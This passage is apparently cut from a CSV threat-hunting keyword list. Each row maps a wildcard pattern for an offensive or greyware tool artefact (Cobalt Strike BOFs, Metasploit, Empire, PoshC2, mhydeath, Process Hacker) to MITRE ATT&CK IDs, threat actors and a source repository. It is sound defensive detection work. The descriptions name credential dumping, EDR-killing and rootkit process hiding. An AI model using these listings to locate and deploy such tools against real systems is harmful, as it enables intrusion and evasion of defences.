Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_killer.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*process_memdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*process_mimikatz*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*process_protection_enum *","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*process_protection_enum*.dmp*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10",,"N/A",,, +"*process_protection_enum.*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*Process_Protection_Level_BOF.*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*Process_Protection_Level_BOF/*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*process_snapshot.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*ProcessCommandChannelImplantMessage*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*ProcessDestroy.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessEncryptedC2Request*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*ProcessFileZillaFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*processhacker-*-sdk.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*processhacker-*-setup.exe*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*processhacker-*-src.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*ProcessHacker.exe*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*ProcessHacker.sln*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*ProcessHerpaderping_x64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderping_x86*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderpingTemplate*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*processhider.c*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*-ProcessID * -Dll * -Module *","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*processImplantMessage*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*process-inject *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*processinject_min_alloc*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
